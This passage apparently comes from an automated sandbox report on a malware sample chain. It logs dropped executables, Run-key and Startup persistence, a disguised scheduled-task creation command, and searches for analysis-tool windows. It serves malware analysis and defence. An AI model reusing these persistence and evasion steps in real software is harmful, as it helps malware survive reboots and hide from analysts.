                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\vQeyqr1[1].exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exeFile created: C:\Users\user\AppData\Local\Temp\UKzjyWlrjRLOjKNNlNHI.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\003[1].exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1018875001\2gwmtZs.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1018905001\92133eb3c2.exeJump to dropped file

                    Boot Survival

                    barindex
                    Source: Yara matchFile source: 14.2.vQeyqr1.exe.1e610000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.vQeyqr1.exe.1e610000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000E.00000002.4777458351.000000001E610000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 22b355416f.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run d44a5c682a.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 224de4e34e.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 2002c77d6d.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XClient
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonclassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonclassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018875001\2gwmtZs.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018875001\2gwmtZs.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018875001\2gwmtZs.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018875001\2gwmtZs.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018875001\2gwmtZs.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exeWindow searched: window name: FilemonClass
                    Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                    Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exeWindow searched: window name: RegmonClass
                    Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exeWindow searched: window name: FilemonClass
                    Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                    Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exeWindow searched: window name: Regmonclass
                    Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exeWindow searched: window name: Filemonclass
                    Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                    Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exeWindow searched: window name: FilemonClass
                    Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                    Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exeWindow searched: window name: RegmonClass
                    Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exeWindow searched: window name: FilemonClass
                    Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                    Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exeWindow searched: window name: Regmonclass
                    Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exeWindow searched: window name: Filemonclass
                    Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                    Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnkJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\skotes.jobJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnkJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 224de4e34e.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 224de4e34e.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 22b355416f.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 22b355416f.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run d44a5c682a.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run d44a5c682a.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 2002c77d6d.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 2002c77d6d.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XClient
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XClient

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\868694659E05004862FF CC52384910CEE944DDBCC575A8E0177BFA6B16E3032438B207797164D5C94B34Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess information set: NOOPENFILEERRORBOX
